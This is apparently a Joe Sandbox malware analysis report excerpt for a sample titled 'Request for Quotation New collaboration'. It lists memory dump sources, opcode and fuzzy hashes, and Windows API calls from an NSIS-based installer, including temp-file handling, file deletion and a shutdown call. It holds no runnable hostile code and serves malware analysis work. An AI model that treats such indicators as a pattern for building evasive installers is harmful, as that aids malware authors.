                                                                                                                                  • Opcode ID: e6247fec2e75a0dd04c04a9d50faafc3ab137cd50d3406d81af249ee4bb0f81f
                                                                                                                                  • Instruction ID: b5b24d5cbf801be9a4cab9f8b994171a45c4e8a887e54061fe8fbe454d029654
                                                                                                                                  • Opcode Fuzzy Hash: e6247fec2e75a0dd04c04a9d50faafc3ab137cd50d3406d81af249ee4bb0f81f
                                                                                                                                  • Instruction Fuzzy Hash: EFF0A935E082089FDB10DFD4C8407AE7BF9FB84324F00492AE419A7B54DB75A595CB92
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2837241314.0000000037EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 37EE0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_37ee0000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: ad827372834e0f8608aa2e0195fce331753fc76ff90c03f6236cac8054ca72be
                                                                                                                                  • Instruction ID: 6580192dee401093151e54eb64963263a76ebeddd1e9b6a71a30724ff7791dd8
                                                                                                                                  • Opcode Fuzzy Hash: ad827372834e0f8608aa2e0195fce331753fc76ff90c03f6236cac8054ca72be
                                                                                                                                  • Instruction Fuzzy Hash: D9F0E2203483452FE3022AB9886177B77AE9BC2264B10807FD545DB782DE648C0B83E6
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2837241314.0000000037EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 37EE0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_37ee0000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 27b3ec5ccb98ea7b38dd93bc40afeea49bc237fa68ee182b86e686ddb99823f7
                                                                                                                                  • Instruction ID: 996559d4f58f4380c01c42a5badf9f318302b892aaa442199cc2858adb4041c7
                                                                                                                                  • Opcode Fuzzy Hash: 27b3ec5ccb98ea7b38dd93bc40afeea49bc237fa68ee182b86e686ddb99823f7
                                                                                                                                  • Instruction Fuzzy Hash: 7EF0A7613443056BE60522A9845577F63AEABC5271F50843AF505D7640DEA4CC0647E6
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2837241314.0000000037EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 37EE0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_37ee0000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 1c18199a9fb978fc58eb1d9f3b23bfd738484c9e689748eabc955804f13dcfbb
                                                                                                                                  • Instruction ID: 8eb3637dc506e89672d9628e0f54776fd174798767bd500dc93babc993edded7
                                                                                                                                  • Opcode Fuzzy Hash: 1c18199a9fb978fc58eb1d9f3b23bfd738484c9e689748eabc955804f13dcfbb
                                                                                                                                  • Instruction Fuzzy Hash: BCF05A3600454ABFCF039F90CD00CC97FAAAF4A254B499192FA088A131D232D9A4EB51
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2837241314.0000000037EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 37EE0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_37ee0000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: b4bfaabe88d98f5edfc43c1d8dee94e6fa27f698f38607df86e3d52c114fe4d4
                                                                                                                                  • Instruction ID: 4061d08f981052c8f88c500e8d883a194ce9f04620929b37db457c28ac35f432
                                                                                                                                  • Opcode Fuzzy Hash: b4bfaabe88d98f5edfc43c1d8dee94e6fa27f698f38607df86e3d52c114fe4d4
                                                                                                                                  • Instruction Fuzzy Hash: BBE01A7001AF81AFE3121B706C6C66A7FB8FB0B317B842C85A04D86032CB685484C755
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2837241314.0000000037EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 37EE0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_37ee0000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 3bf316fe54e54521d4b076f5f2c8e7de06abc4aeaeab560df04d32b655e22d04
                                                                                                                                  • Instruction ID: adbec025f58970d34d7de376cc5c52537d8e63e7ccd11e67bec5dd351198aae5
                                                                                                                                  • Opcode Fuzzy Hash: 3bf316fe54e54521d4b076f5f2c8e7de06abc4aeaeab560df04d32b655e22d04
                                                                                                                                  • Instruction Fuzzy Hash: 0AE0173555E7D02FE31346396820989AFF9CD8792031A8AEFD0C8CB0A795084D8E8B66
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2837241314.0000000037EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 37EE0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_37ee0000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 6903ba86b65ab7c1597919124fbece268e896ccd967e0ea2b8ad226b2dac6817
                                                                                                                                  • Instruction ID: b50ee0c138e7d05c30e098a0730747160897e889b4e5e354fd05971ebb6771ba
                                                                                                                                  • Opcode Fuzzy Hash: 6903ba86b65ab7c1597919124fbece268e896ccd967e0ea2b8ad226b2dac6817
                                                                                                                                  • Instruction Fuzzy Hash: A5C08C32218720679714A26DB8809EE63DACEC96B0B00CF2FF04993904DDA08E4B458F
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2837241314.0000000037EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 37EE0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_37ee0000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: da39a02747ed761ae7536486d0509030afb7a2cbe45d707a38ac480ab780b57d
                                                                                                                                  • Instruction ID: a742539984dafff94c52f925daa6b2fa3df31251a5fa943cf36a9296c4464682
                                                                                                                                  • Opcode Fuzzy Hash: da39a02747ed761ae7536486d0509030afb7a2cbe45d707a38ac480ab780b57d
                                                                                                                                  • Instruction Fuzzy Hash: 13C012B0000E098BE2042F60BC0CB39B2B8B747317FC42D10E008028308BA99454C649
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2837241314.0000000037EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 37EE0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_37ee0000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 9a0f35ea53c4be6251a6166202660e0532a75d503bbbb9633f6711a26745ee37
                                                                                                                                  • Instruction ID: cdbc5cb5a39b9fc209755f0652049b86092fbe2c385c2a3543650eda90fadf47
                                                                                                                                  • Opcode Fuzzy Hash: 9a0f35ea53c4be6251a6166202660e0532a75d503bbbb9633f6711a26745ee37
                                                                                                                                  • Instruction Fuzzy Hash: A8C08C30268308CFE240AA1CC584BA533ADEF89B14F0058A0F0098BB21CA62FC004A49
                                                                                                                                  APIs
                                                                                                                                  • GetDlgItem.USER32(?,000003F9), ref: 00404B28
                                                                                                                                  • GetDlgItem.USER32(?,00000408), ref: 00404B33
                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 00404B7D
                                                                                                                                  • LoadBitmapW.USER32(0000006E), ref: 00404B90
                                                                                                                                  • SetWindowLongW.USER32(?,000000FC,00405108), ref: 00404BA9
                                                                                                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404BBD
                                                                                                                                  • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404BCF
                                                                                                                                  • SendMessageW.USER32(?,00001109,00000002), ref: 00404BE5
                                                                                                                                  • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404BF1
                                                                                                                                  • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404C03
                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 00404C06
                                                                                                                                  • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404C31
                                                                                                                                  • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404C3D
                                                                                                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404CD3
                                                                                                                                  • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404CFE
                                                                                                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D12
                                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00404D41
                                                                                                                                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404D4F
                                                                                                                                  • ShowWindow.USER32(?,00000005), ref: 00404D60
                                                                                                                                  • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404E5D
                                                                                                                                  • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404EC2
                                                                                                                                  • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404ED7
                                                                                                                                  • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404EFB
                                                                                                                                  • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404F1B
                                                                                                                                  • ImageList_Destroy.COMCTL32(?), ref: 00404F30
                                                                                                                                  • GlobalFree.KERNEL32(?), ref: 00404F40
                                                                                                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404FB9
                                                                                                                                  • SendMessageW.USER32(?,00001102,?,?), ref: 00405062
                                                                                                                                  • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405071
                                                                                                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 00405091
                                                                                                                                  • ShowWindow.USER32(?,00000000), ref: 004050DF
                                                                                                                                  • GetDlgItem.USER32(?,000003FE), ref: 004050EA
                                                                                                                                  • ShowWindow.USER32(00000000), ref: 004050F1
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2809614839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000005.00000002.2809587637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809635003.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809662370.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809690813.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809690813.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809690813.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                  • String ID: $M$N
                                                                                                                                  • API String ID: 1638840714-813528018
                                                                                                                                  • Opcode ID: f5222cf6d3fcdeff0966a9eee7e30bd6d921d2d03bb49bae54bf4b748700a109
                                                                                                                                  • Instruction ID: d71a5cbf05b966a5fca8a5aa47d1df2e6c399d67ef135bcf6f64f468dd7cdb7f
                                                                                                                                  • Opcode Fuzzy Hash: f5222cf6d3fcdeff0966a9eee7e30bd6d921d2d03bb49bae54bf4b748700a109
                                                                                                                                  • Instruction Fuzzy Hash: 6E027FB0900209EFEB209F54DD85AAE7BB5FB84314F10857AF610BA2E0D7799D52CF58
                                                                                                                                  APIs
                                                                                                                                  • #17.COMCTL32 ref: 00403379
                                                                                                                                  • SetErrorMode.KERNEL32(00008001), ref: 00403384
                                                                                                                                  • OleInitialize.OLE32(00000000), ref: 0040338B
                                                                                                                                    • Part of subcall function 00406254: GetModuleHandleA.KERNEL32(?,?,00000020,0040339D,00000008), ref: 00406266
                                                                                                                                    • Part of subcall function 00406254: LoadLibraryA.KERNEL32(?,?,00000020,0040339D,00000008), ref: 00406271
                                                                                                                                    • Part of subcall function 00406254: GetProcAddress.KERNEL32(00000000,?), ref: 00406282
                                                                                                                                  • SHGetFileInfoW.SHELL32(00420690,00000000,?,000002B4,00000000), ref: 004033B3
                                                                                                                                    • Part of subcall function 00405EEA: lstrcpynW.KERNEL32(?,?,00000400,004033C8,004281E0,NSIS Error), ref: 00405EF7
                                                                                                                                  • GetCommandLineW.KERNEL32(004281E0,NSIS Error), ref: 004033C8
                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,00434000,00000000), ref: 004033DB
                                                                                                                                  • CharNextW.USER32(00000000,00434000,00000020), ref: 00403402
                                                                                                                                  • GetTempPathW.KERNEL32(00000400,00436800,00000000,00000020), ref: 0040350B
                                                                                                                                  • GetWindowsDirectoryW.KERNEL32(00436800,000003FB), ref: 0040351C
                                                                                                                                  • lstrcatW.KERNEL32(00436800,\Temp), ref: 00403528
                                                                                                                                  • GetTempPathW.KERNEL32(000003FC,00436800,00436800,\Temp), ref: 0040353C
                                                                                                                                  • lstrcatW.KERNEL32(00436800,Low), ref: 00403544
                                                                                                                                  • SetEnvironmentVariableW.KERNEL32(TEMP,00436800,00436800,Low), ref: 00403555
                                                                                                                                  • SetEnvironmentVariableW.KERNEL32(TMP,00436800), ref: 0040355D
                                                                                                                                  • DeleteFileW.KERNEL32(00436000), ref: 00403571
                                                                                                                                  • OleUninitialize.OLE32(?), ref: 00403621
                                                                                                                                  • ExitProcess.KERNEL32 ref: 00403641
                                                                                                                                  • lstrcatW.KERNEL32(00436800,~nsu.tmp,00434000,00000000,?), ref: 0040364D
                                                                                                                                  • lstrcmpiW.KERNEL32(00436800,00435800,00436800,~nsu.tmp,00434000,00000000,?), ref: 00403659
                                                                                                                                  • CreateDirectoryW.KERNEL32(00436800,00000000), ref: 00403665
                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(00436800), ref: 0040366C
                                                                                                                                  • DeleteFileW.KERNEL32(0041FE90,0041FE90,?,0042A000,?), ref: 004036C6
                                                                                                                                  • CopyFileW.KERNEL32(00437800,0041FE90,00000001), ref: 004036DA
                                                                                                                                  • CloseHandle.KERNEL32(00000000,0041FE90,0041FE90,?,0041FE90,00000000), ref: 00403707
                                                                                                                                  • GetCurrentProcess.KERNEL32(00000028,00000004,00000005,00000004,00000003), ref: 0040375D
                                                                                                                                  • ExitWindowsEx.USER32(00000002,00000000), ref: 00403799
                                                                                                                                  • ExitProcess.KERNEL32 ref: 004037BC
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2809614839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000005.00000002.2809587637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809635003.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809662370.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809690813.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809690813.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809690813.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$DirectoryExitHandleProcesslstrcat$CurrentDeleteEnvironmentModulePathTempVariableWindows$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextProcUninitializelstrcmpilstrcpyn
                                                                                                                                  • String ID: Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$\Temp$~nsu.tmp
                                                                                                                                  • API String ID: 4107622049-1875889550
                                                                                                                                  • Opcode ID: f59da56ce79cf3752257f316979aefb191ab981252506581a540253af1472897
                                                                                                                                  • Instruction ID: adac61535fb2ab45c93a94ea6b46826cba801cc8f349b6914fd9ce0ca4797ca8
                                                                                                                                  • Opcode Fuzzy Hash: f59da56ce79cf3752257f316979aefb191ab981252506581a540253af1472897
                                                                                                                                  • Instruction Fuzzy Hash: 72B1C170904211AAD720BF619D49A3B3EACEB4570AF40453FF542BA2E2D77C9941CB7E
                                                                                                                                  APIs
                                                                                                                                  • DeleteFileW.KERNEL32(?,?,00436800,76F92EE0,00434000), ref: 0040579B
                                                                                                                                  • lstrcatW.KERNEL32(004246D8,\*.*,004246D8,?,?,00436800,76F92EE0,00434000), ref: 004057E3
                                                                                                                                  • lstrcatW.KERNEL32(?,00409014,?,004246D8,?,?,00436800,76F92EE0,00434000), ref: 00405806
                                                                                                                                  • lstrlenW.KERNEL32(?,?,00409014,?,004246D8,?,?,00436800,76F92EE0,00434000), ref: 0040580C
                                                                                                                                  • FindFirstFileW.KERNEL32(004246D8,?,?,?,00409014,?,004246D8,?,?,00436800,76F92EE0,00434000), ref: 0040581C
                                                                                                                                  • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 004058BC
                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 004058CB
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2809614839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000005.00000002.2809587637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809635003.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809662370.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809690813.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809690813.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809690813.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                  • String ID: \*.*
                                                                                                                                  • API String ID: 2035342205-1173974218
                                                                                                                                  • Opcode ID: f101a222198de3598bef61ef3d06d471c43b44ecc91151dca5712a762e0b7e66
                                                                                                                                  • Instruction ID: 64b0c8684543101156bed993c7ef625b5cb6937b92a1292c702a5556077473ca
                                                                                                                                  • Opcode Fuzzy Hash: f101a222198de3598bef61ef3d06d471c43b44ecc91151dca5712a762e0b7e66
                                                                                                                                  • Instruction Fuzzy Hash: 4341B031800914EADF217B619C89ABF7678EF45728F10817BF800B51D1D77C4992DE6E
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2809614839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000005.00000002.2809587637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809635003.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809662370.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809690813.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809690813.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809690813.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 30143bd0a3c86c84675fe989439f4e854c087b2e65987d853f873e8b3ce332d5
                                                                                                                                  • Instruction ID: edf170fb2c3714e597751af3e8fd03d842b3b080db723bf9ee749212abe0df6d
                                                                                                                                  • Opcode Fuzzy Hash: 30143bd0a3c86c84675fe989439f4e854c087b2e65987d853f873e8b3ce332d5
                                                                                                                                  • Instruction Fuzzy Hash: D3F17771D00229CBCF28CFA8C8946ADBBB1FF44305F25856ED856BB281D7785A96CF44
                                                                                                                                  APIs
                                                                                                                                  • FindFirstFileW.KERNEL32(00436800,00425720,00424ED8,00405A86,00424ED8,00424ED8,00000000,00424ED8,00424ED8,00436800,?,76F92EE0,00405792,?,00436800,76F92EE0), ref: 00406238
                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00406244
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2809614839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000005.00000002.2809587637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809635003.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809662370.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809690813.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809690813.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809690813.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Find$CloseFileFirst
                                                                                                                                  • String ID: WB
                                                                                                                                  • API String ID: 2295610775-2854515933
                                                                                                                                  • Opcode ID: 97d8ac7551d2396f11c19c7edcb60b5d9a64dc0e7ee5904d5f336116d8bf08e8
                                                                                                                                  • Instruction ID: f398094869b5afba054f99dea52ba5834f85055b19877d8081192ff4b2f0d438
                                                                                                                                  • Opcode Fuzzy Hash: 97d8ac7551d2396f11c19c7edcb60b5d9a64dc0e7ee5904d5f336116d8bf08e8
                                                                                                                                  • Instruction Fuzzy Hash: DAD012319480209BC21037387E0C85B7A59AB493307524AB7F82AF27E0C738AC6586AD
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2837241314.0000000037EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 37EE0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_37ee0000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: .5q
                                                                                                                                  • API String ID: 0-3553790735
                                                                                                                                  • Opcode ID: d9085794b6362a0a3b9f9e4c12ef680e1510b9b46a2c810bc5b38a192d1894dd
                                                                                                                                  • Instruction ID: 58947a85c81f481005583e1631572257b492c912ca1d42b6e401d1366f145c01
                                                                                                                                  • Opcode Fuzzy Hash: d9085794b6362a0a3b9f9e4c12ef680e1510b9b46a2c810bc5b38a192d1894dd
                                                                                                                                  • Instruction Fuzzy Hash: D7629B74A01268CFDB64DF65C884BDDBBB2BF89301F1085EAD809AB255DB359E81CF50
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2835591179.00000000351A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 351A0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_351a0000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: dc5e1abd13f0f1c65e36b5b6dcf1262e92246db54483502a45e4b5a4e399a0c0
                                                                                                                                  • Instruction ID: 4a909d88cf4fe40daad6d55d382dab03313ff2e3264d13a3198ad6626bb3fb47
                                                                                                                                  • Opcode Fuzzy Hash: dc5e1abd13f0f1c65e36b5b6dcf1262e92246db54483502a45e4b5a4e399a0c0
                                                                                                                                  • Instruction Fuzzy Hash: 9AC1B278E00218CFDB15DFA5C994B9DBBB2BF89300F5080A9D409AB365DB355A85CF54
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2835591179.00000000351A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 351A0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_351a0000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 90ddd70963bc69f6432949fe9305e06f53c0bdbc00c0397374b9f5f1e21ed14a
                                                                                                                                  • Instruction ID: 33c2f9c4f117c533b99f2c71a822a7f0ba95e7ff6a1c7e4201df1f34c584fe0a
                                                                                                                                  • Opcode Fuzzy Hash: 90ddd70963bc69f6432949fe9305e06f53c0bdbc00c0397374b9f5f1e21ed14a
                                                                                                                                  • Instruction Fuzzy Hash: 43C19179E00218CFEB15DFA5C994B9DBBB2BF89300F1081A9D409BB365DB355A85CF14
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2835591179.00000000351A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 351A0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_351a0000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 9e5d7c22ba9a5b0a8887769fcf69e8a33263a6ee9f4be3e56c2b189f34905a2b
                                                                                                                                  • Instruction ID: 72026a9af6bb7365beb05ce1255b373721196aa891f9361de7c47c459c471bcc
                                                                                                                                  • Opcode Fuzzy Hash: 9e5d7c22ba9a5b0a8887769fcf69e8a33263a6ee9f4be3e56c2b189f34905a2b
                                                                                                                                  • Instruction Fuzzy Hash: FCC1A079E00218CFEB15DFA5C994B9DBBB2BF89300F1081A9D409BB365DB355A85CF14
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2835591179.00000000351A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 351A0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_351a0000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 8f408ba51e91f56e95fd7d96c65210144662f00aab48a2fdc3d8d4e6d467bbb4
                                                                                                                                  • Instruction ID: 70c7cfd7c43e56b5736c06ea33fe50d8ca1ac67d1e2db038909486a5ac9eef73
                                                                                                                                  • Opcode Fuzzy Hash: 8f408ba51e91f56e95fd7d96c65210144662f00aab48a2fdc3d8d4e6d467bbb4
                                                                                                                                  • Instruction Fuzzy Hash: 9EC1A079E00218CFEB15DFA5C994B9DBBB2BF89300F1080A9D409AB365DB359A85CF54
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2835591179.00000000351A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 351A0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_351a0000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
